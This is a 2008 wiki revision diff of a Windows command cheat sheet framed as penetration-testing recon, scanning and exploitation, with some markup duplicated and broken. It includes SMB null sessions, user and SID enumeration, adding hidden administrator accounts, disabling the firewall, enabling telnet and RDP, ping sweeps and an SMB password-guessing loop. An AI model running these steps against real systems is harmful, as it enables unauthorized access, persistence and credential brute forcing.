Difference between revisions of "Windows Commands"
Line 26: | Line 26: | ||
* -w <N> -- wait for Nms before timing out (default 4000) | * -w <N> -- wait for Nms before timing out (default 4000) | ||
=== | ===SMB session=== | ||
Establishing a null session | |||
<pre>net use \\<target> "" /u:""</pre> | <pre>net use \\<target> "" /u:""</pre> | ||
* Pulling credentials | Establishing an authenticated session | ||
<pre>net use \\<target> <password> /u:<username> | |||
Mount a share | |||
<pre>net use * \\<target>\<share> <password> /u:<username> | |||
net use * \\<target>\<share> <password> /u:<machinename>\<username> | |||
net use * \\<target>\c$ <password> /u:<username></pre> | |||
Dropping SMB sessions | |||
<pre>net use \\<target> /del</pre> | |||
Dropping all SMB sessions (bad idea) | |||
<pre>net use * /del</pre> | |||
===Pulling credentials (w/ SMB session)=== | |||
Pulling credentials | |||
<pre>enum -U <target> | <pre>enum -U <target> | ||
enum -G <target></pre> | enum -G <target></pre> | ||
user2sid | |||
* Outputs in the form S-X-Y-target_sid-RID | |||
<pre>user2sid \\<target> <machine_name></pre> | <pre>user2sid \\<target> <machine_name></pre> | ||
sid2user | |||
* Requires spaces instead of dashes | |||
<pre>sid2user \\<target> 5 <target_sid> <N></pre> | <pre>sid2user \\<target> 5 <target_sid> <N></pre> | ||
<pre>for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i</pre> | <pre>for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i</pre> | ||
Line 63: | Line 78: | ||
Start a service | Start a service | ||
<pre>sc config <servicename> start= | <pre>sc config <servicename> start= demand | ||
sc start <servicename> | sc start <servicename> | ||
Starting telnet | Starting telnet | ||
<pre>sc query tlntsvr | <pre>sc query tlntsvr | ||
sc config tlntsvr start= | sc config tlntsvr start= demand | ||
sc start tlntsvr</pre> | sc start tlntsvr</pre> | ||
Starting terminal services | Starting terminal services | ||
<pre>sc query termservice | <pre>sc query termservice | ||
sc config termservice start= | sc config termservice start= demand | ||
sc start termservice</pre> | sc start termservice</pre> | ||
===Variables=== | |||
Finding environmental variables | |||
<pre>set</pre> | |||
Finding a specific variable | |||
<pre>set <variable> | |||
echo %<variable>% | |||
set username | |||
set path | |||
set systemroot | |||
echo %systemroot% | |||
cd %systemroot% | |||
etc.</pre> | |||
===Users and groups=== | ===Users and groups=== | ||
Line 99: | Line 128: | ||
Adding a user to the terminal services group | Adding a user to the terminal services group | ||
<pre>net localgroup "Remote Desktop Users" <username> /add | <pre>net localgroup "Remote Desktop Users" <username> /add | ||
List administrators | |||
<pre>net localgroup administrators</pre> | |||
Add an administrator | |||
<pre>net user <username> %lt;password> /add | |||
net localgroup administrators <username> /add</pre> | |||
Remove a user from a group | |||
<pre>net localgroup <group> <username> /del</pre> | |||
Delete a user | |||
<pre>net user <username> /del</pre> | |||
===Firewall interaction=== | ===Firewall interaction=== | ||
Help | |||
<pre>netsh /?</pre> | |||
Show config | |||
<pre>netsh firewall show config</pre> | |||
Open a specific port | |||
<pre>netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR> | |||
Remove the port opening | |||
<pre>netsh firewall del portopening protocol = <TCP|UDP> port = <port> | |||
Disable the firewall completely (bad idea) | |||
<pre>netsh firewall set opmode disable</pre> | |||
Opening the firewall for telnet | Opening the firewall for telnet | ||
<pre>netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address></pre> | <pre>netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address></pre> | ||
Line 121: | Line 178: | ||
===Registry interaction=== | ===Registry interaction=== | ||
Query a key | |||
<pre>reg query <keyname></pre> | |||
Adding a key | |||
<pre>reg add <keyname> /v <valuename> /t <type> /d <data></pre> | |||
Export data | |||
<pre>reg export <keyname> <filename.reg></pre> | |||
Import data | |||
<pre>reg import <filename.reg></pre> | |||
Enabling terminal services | Enabling terminal services | ||
<pre>reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0</pre> | <pre>reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0</pre> | ||
Line 127: | Line 196: | ||
Finding a port | Finding a port | ||
<pre>netstat -an | find "<port>"</pre> | <pre>netstat -an | find "<port>"</pre> | ||
===ipconfig=== | |||
Dump the DNS cache | |||
<pre>ipconfig /displaydns</pre> | |||
===arp=== | |||
Dump the ARP cache | |||
<pre>arp -a</pre> | |||
===Looping=== | |||
/L loop | |||
<pre>for /L %i in (<start>,<step>,<stop>) do <command></pre> | |||
Counting | |||
<pre>for /L %i in (1,1,255) do @echo %i</pre> | |||
Ping scanning | |||
<pre>for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"</pre> | |||
DNS bruteforce | |||
<pre>for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i</pre> | |||
/F loop | |||
<pre>for /F ["<options>"] %i in (<stuff>) do <command></pre> | |||
Looping through passwords | |||
<pre>for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause</pre> | |||
Portscanning from a file | |||
<pre>for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i</pre> |
Revision as of 14:44, 18 July 2008
Recon
nslookup
- Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
- Interactive mode:
nslookup > [name or ip] > server [server ip] > set type=any > ls -d [target_domain] [> filename] > view [filename]
- No recurse:
> set norecurse > set recurse
Scanning
tracert
Parameters
- -d -- don't resolve names
- -h <N> -- max number of hops (default 30)
- -j <hostlist> -- use loose source routing
- -w <N> -- wait for Nms before timing out (default 4000)
SMB session
Establishing a null session
net use \\<target> "" /u:""
Establishing an authenticated session
net use \\<target> <password> /u:<username> Mount a share <pre>net use * \\<target>\<share> <password> /u:<username> net use * \\<target>\<share> <password> /u:<machinename>\<username> net use * \\<target>\c$ <password> /u:<username>
Dropping SMB sessions
net use \\<target> /del
Dropping all SMB sessions (bad idea)
net use * /del
Pulling credentials (w/ SMB session)
Pulling credentials
enum -U <target> enum -G <target>
user2sid
- Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>
sid2user
- Requires spaces instead of dashes
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i
Exploitation
Finding client-side programs
dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"
Service interaction
List running services
sc query
List all services
sc query state= all
List all service names
sc query state= all | find "SERVICE_NAME"
Query service information
sc query <servicename> sc qc <servicename>
Start a service
sc config <servicename> start= demand sc start <servicename> Starting telnet <pre>sc query tlntsvr sc config tlntsvr start= demand sc start tlntsvr
Starting terminal services
sc query termservice sc config termservice start= demand sc start termservice
Variables
Finding environmental variables
set
Finding a specific variable
set <variable> echo %<variable>% set username set path set systemroot echo %systemroot% cd %systemroot% etc.
Users and groups
Listing users
net user
Creating a user
net user <username> <password> /add
Listing groups
net localgroup
Creating a group
net localgroup <groupname> /add
Adding a user to a group
net localgroup <groupname> <username> /add
Adding a user to the telnet users group
net user <username> <password> /add net localgroup TelnetClients /add net localgroup TelnetClients <username> /add Adding a user to the terminal services group <pre>net localgroup "Remote Desktop Users" <username> /add List administrators <pre>net localgroup administrators
Add an administrator
net user <username> %lt;password> /add net localgroup administrators <username> /add
Remove a user from a group
net localgroup <group> <username> /del
Delete a user
net user <username> /del
Firewall interaction
Help
netsh /?
Show config
netsh firewall show config
Open a specific port
netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR> Remove the port opening <pre>netsh firewall del portopening protocol = <TCP|UDP> port = <port> Disable the firewall completely (bad idea) <pre>netsh firewall set opmode disable
Opening the firewall for telnet
netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Firewall interaction
Opening the firewall for telnet
netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Registry interaction
Query a key
reg query <keyname>
Adding a key
reg add <keyname> /v <valuename> /t <type> /d <data>
Export data
reg export <keyname> <filename.reg>
Import data
reg import <filename.reg>
Enabling terminal services
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0
netstat
Finding a port
netstat -an | find "<port>"
ipconfig
Dump the DNS cache
ipconfig /displaydns
arp
Dump the ARP cache
arp -a
Looping
/L loop
for /L %i in (<start>,<step>,<stop>) do <command>
Counting
for /L %i in (1,1,255) do @echo %i
Ping scanning
for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"
DNS bruteforce
for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
/F loop
for /F ["<options>"] %i in (<stuff>) do <command>
Looping through passwords
for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause
Portscanning from a file
for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i